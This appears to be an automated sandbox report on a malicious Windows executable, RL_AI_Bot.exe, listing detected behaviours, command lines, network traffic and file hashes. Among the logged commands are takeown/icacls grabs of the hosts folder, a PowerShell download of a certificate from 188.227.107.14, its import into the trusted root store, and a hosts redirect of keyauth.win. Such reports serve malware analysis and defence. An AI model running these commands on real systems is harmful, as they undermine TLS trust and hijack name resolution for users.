Analysis Overview
SHA256
c388a38e46a212f9413d41a9f28265a2fe1c7c77b3620bfcdcc6c7b4b3b9dee0
Threat Level: Likely malicious
The file RL_AI_Bot.exe was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Possible privilege escalation attempt
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Executes dropped EXE
Themida packer
Modifies file permissions
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Hide Artifacts: Ignore Process Interrupts
Unsigned PE
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Gathers network information
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-05 00:19
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-05 00:19
Reported
2024-10-05 00:20
Platform
win11-20240802-en
Max time kernel
33s
Max time network
35s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe
"C:\Users\Admin\AppData\Local\Temp\RL_AI_Bot.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c @echo off & echo Running fix.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat & exit"
C:\Windows\system32\takeown.exe
takeown /F C:\Windows\System32\drivers\etc /R /A
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\etc /grant administrators:F /T
C:\Windows\system32\certutil.exe
certutil -store TrustedRoot
C:\Windows\system32\findstr.exe
findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\server.crt" SHA256
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
C:\Windows\system32\certutil.exe
certutil -store TrustedRoot
C:\Windows\system32\findstr.exe
findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
C:\Windows\system32\findstr.exe
findstr /C:"188.227.107.14 keyauth.win" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
C:\Users\Admin\AppData\Local\Temp\RL_AI.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RL_AI.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
Network
| Country | Destination | Domain | Proto |
| NL | 188.227.107.14:80 | 188.227.107.14 | tcp |
| US | 8.8.8.8:53 | 14.107.227.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49797 | tcp | |
| N/A | 127.0.0.1:49799 | tcp | |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49806 | tcp | |
| N/A | 127.0.0.1:49808 | tcp | |
| N/A | 127.0.0.1:49813 | tcp | |
| N/A | 127.0.0.1:49815 | tcp | |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49818 | tcp | |
| N/A | 127.0.0.1:49820 | tcp | |
| NL | 188.227.107.14:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49824 | tcp | |
| N/A | 127.0.0.1:49826 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\autA151.tmp
| MD5 | 898bbb4fac0d31cacf8bd6f0ea1dcd14 |
| SHA1 | cbc25afd3e39ec0b030a6148ad44ae882ad063be |
| SHA256 | 87f84086ae3ebd38fe6df4c2a90cc2064787c9a863bb279cc278467aa2f0edc9 |
| SHA512 | 66848d109d566c7f6c273c86b0a8611340e46534a4f028f91091d06900448c95c4093bd987c06a2be4c246ded5c6baa8de3d03049f4cfa49da9b360e6b5a2ec4 |
C:\Users\Admin\AppData\Local\Temp\fix.bat
| MD5 | ded50caaa850f5278662834fd32021ae |
| SHA1 | 2bd1354b58408585a5ef862838cb97f7ab1f219c |
| SHA256 | 9847b9305180be84090dc361c21bfc002223309fbf22a991b5396bf5a5fd79d3 |
| SHA512 | d8286d37a412aa73cd97f0a5321825f5bf138e91069477e4dddfbfcc0835723606a692da858b4331d2f127b50d2154d81fd98bd08d0a1d0904b63e07de689620 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0i3atge.wxq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4824-18-0x000001C65FBF0000-0x000001C65FC12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\server.crt
| MD5 | 5663fb32607a5562453a8125a8f812c4 |
| SHA1 | 764264efe0329df2a961dca0e45efc70878bfed7 |
| SHA256 | f6b3ca3c38d3efebe9a1e98f6042807f087688586c93513bae631fe24e1fe81e |
| SHA512 | 31b05f2d170b77ca4cfe298e913e0c07a7b5e57fbe4f1296b8b616729564f32fc3f53c6993f51dd50015aba808ae4c59560155119556e76744990cef68ef4b86 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e6baeec02c3d93dce26652e7acebc90 |
| SHA1 | 937a7b4a0d42ea56e21a1a00447d899a2aca3c28 |
| SHA256 | 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0 |
| SHA512 | 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 81051bcc2cf1bedf378224b0a93e2877 |
| SHA1 | ba8ab5a0280b953aa97435ff8946cbcbb2755a27 |
| SHA256 | 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6 |
| SHA512 | 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d |
memory/4836-43-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-45-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-47-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-46-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-48-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-51-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-54-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-55-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp
memory/4836-57-0x00007FF7016F0000-0x00007FF701FA2000-memory.dmp